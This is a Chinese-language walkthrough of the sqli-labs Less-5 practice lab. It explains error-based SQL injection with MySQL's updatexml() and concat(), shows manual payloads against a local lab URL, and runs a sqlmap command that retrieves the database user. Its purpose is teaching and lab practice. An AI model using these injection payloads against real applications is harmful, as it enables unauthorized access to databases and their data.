Sqli-labs-Less-5
前言:
SQL注入的三个条件:
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)
利用 order by 来测列数
测显位:mysql用1,2,3,4
Mysql获取相关数据:
一、数据库版本-看是否认符合information_schema查询-version()
二、数据库用户-看是否符合root型注入攻击-user()
三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()
sql注入——报错注入(Error-based)
sqlmap 会替换或者添加用于引发特定数据库错误的 SQL 语句到查询参数里面,并通过解析对应的注入结果,判断特定的数据库错误信息是否存在响应的 headers/body 中。这项技术只有在 Web 应用配置开启后端 DBMS 错误信息提醒才有效。
MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。
updatexml(xml_target, xpath_expr, new_val)
xml_target
是要更新的 XML 列或变量。xpath_expr
是要更新的 XML 节点的路径表达式。new_val
是要替换节点值的新值。
#手工注入
1.根据提示id传参/?id=1,显示You are in...........
/?id=0 显示空 , 即当id值不存在时,前端显示为空
/?id=1' 显示near ''1'' LIMIT 0,1' at line 1 即闭合为 单引号' 闭合
/?id=1' order by 4 --+ 即当值为4时报错,所以列数为3
利用联合查询union 发现仍然显示You are in...........
根据前面的测试,发现联合查询用不了,猜测后台代码逻辑当id 正确执行时显示 You are in........... ,id错误时为空,代码报错显示报错情况。
所以,这题可使用报错注入试试,updatexml()函数+concat():拼接特殊符号和查询结果
http://192.168.0.7:802/sqli-labs/Less-5/?id=0' and updatexml(1,concat(1,(select user())),1)--+
成功利用漏洞!!!
#自动化注入-SQLmap工具注入
SQLmap用户手册:文档介绍 - sqlmap 用户手册
python sqlmap.py -u http://192.168.0.7:802/sqli-labs/Less-5/?id=1 --current-user
爆当前用户为:root@localhost。